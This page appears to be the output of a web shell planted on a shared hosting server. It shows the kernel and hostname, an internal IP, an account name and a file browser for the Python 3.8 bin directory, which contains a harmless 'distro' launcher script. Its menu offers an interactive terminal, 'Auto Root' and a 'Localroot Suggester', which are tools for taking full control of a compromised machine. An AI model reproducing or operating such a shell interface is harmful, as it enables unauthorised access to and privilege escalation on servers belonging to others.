Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.216.32
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python38 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
2to3
108
B
-rwxr-xr-x
2024-09-23 13:01
chardetect
977
B
-rwxr-xr-x
2024-05-30 17:18
distro
966
B
-rwxr-xr-x
2024-05-30 17:28
lswsgi
99.59
KB
-rwxr-xr-x
2021-02-24 16:30
msgfmt3.8.py
7.42
KB
-rwxr-xr-x
2024-09-06 22:41
msgfmt3.py
7.42
KB
-rwxr-xr-x
2024-09-06 22:41
pathfix.py
6.64
KB
-rwxr-xr-x
2024-09-06 22:41
pbr
164
B
-rwxr-xr-x
2020-07-10 14:12
pip
661
B
-rwxr-xr-x
2023-11-13 22:37
pip-3
661
B
-rwxr-xr-x
2023-11-13 22:37
pip-3.8
661
B
-rwxr-xr-x
2023-11-13 22:37
pip3
661
B
-rwxr-xr-x
2023-11-13 22:37
pip3.8
661
B
-rwxr-xr-x
2023-11-13 22:37
pw_migrate
422
B
-rwxr-xr-x
2020-07-10 18:33
pwiz
6.8
KB
-rwxr-xr-x
2020-11-18 22:48
pydoc3
91
B
-rwxr-xr-x
2024-09-23 13:01
pydoc3.8
91
B
-rwxr-xr-x
2024-09-23 13:01
pygettext3.8.py
21.04
KB
-rwxr-xr-x
2024-09-06 22:41
pygettext3.py
21.04
KB
-rwxr-xr-x
2024-09-06 22:41
python3
6.97
KB
-rwxr-xr-x
2024-09-23 13:02
python3-config
171
B
-rwxr-xr-x
2024-09-23 13:01
python3.8
6.97
KB
-rwxr-xr-x
2024-09-23 13:02
python3.8-config
171
B
-rwxr-xr-x
2024-09-23 13:01
python3.8-x86_64-config
3.39
KB
-rwxr-xr-x
2024-09-23 12:54
Save
Rename
#!/opt/alt/python38/bin/python3 # EASY-INSTALL-ENTRY-SCRIPT: 'distro==1.6.0','console_scripts','distro' import re import sys # for compatibility with easy_install; see #2198 __requires__ = 'distro==1.6.0' try: from importlib.metadata import distribution except ImportError: try: from importlib_metadata import distribution except ImportError: from pkg_resources import load_entry_point def importlib_load_entry_point(spec, group, name): dist_name, _, _ = spec.partition('==') matches = ( entry_point for entry_point in distribution(dist_name).entry_points if entry_point.group == group and entry_point.name == name ) return next(matches).load() globals().setdefault('load_entry_point', importlib_load_entry_point) if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(load_entry_point('distro==1.6.0', 'console_scripts', 'distro')())